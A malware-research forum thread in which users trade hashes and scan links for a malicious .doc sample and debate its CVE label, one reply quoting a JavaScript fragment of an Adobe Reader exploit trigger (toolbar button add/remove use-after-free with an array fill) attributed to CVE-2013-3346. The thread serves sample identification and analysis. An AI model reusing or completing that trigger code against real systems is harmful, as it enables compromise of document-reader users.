[voroojax]

hey, I'm looking for CVE-2014-496 and it's dropped files.

3f52a11cfb979bc3e56eca785c2c56d5cd0583700b2b159798915b5f8a9bc376.doc
MD5: e328ff8856baa527c41a22d653f9710f
SHA1: 272755200ff8d3f399a158410bf2015160fda73d

known as:
Exploit.CVE-2014-0496.Gen
TROJ_GEN.F47V0211

available in malwr(not public): https://malwr.com/analysis/YjI2NDM1NDVm ... I5YWU2NTE/

thanks

[malwarelabs]

Virustotal link but not more :/
https://www.virustotal.com/en/file/3f52 ... /analysis/

[p4r4n0id]

Attached!

p4r4n0id

[sugar]

@p4r4n0id its CVE-2013-3346

Code: Select all

  removeButtonFunc = function () {
    app.removeToolButton({
        cName: "evil"
    });

    for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
  }

  addButtonFunc = function () {
    app.addToolButton({
      cName: "xxx",
      cExec: "1",
      cEnable: "removeButtonFunc();"
    });
  }

  app.addToolButton({
    cName: "evil",
    cExec: "1",
    cEnable: "addButtonFunc();"
  });

[p4r4n0id]

Attached the hash mentioned above - e328ff8856baa527c41a22d653f9710f. if u got the correct hash post it and will try help.....

- p4r4n0id

[malwarelabs]

it's look like confusion on virustotal.:
nProtect Exploit.CVE-2014-0496.Gen
but it's this vuln: http://www.fireeye.com/blog/technical/c ... lysis.html

[voroojax]

yeah, seems nProtect showing wrong result.
I've no other hash. If anyone got the hash please consider posting it.
btw thanks p4r4n0id .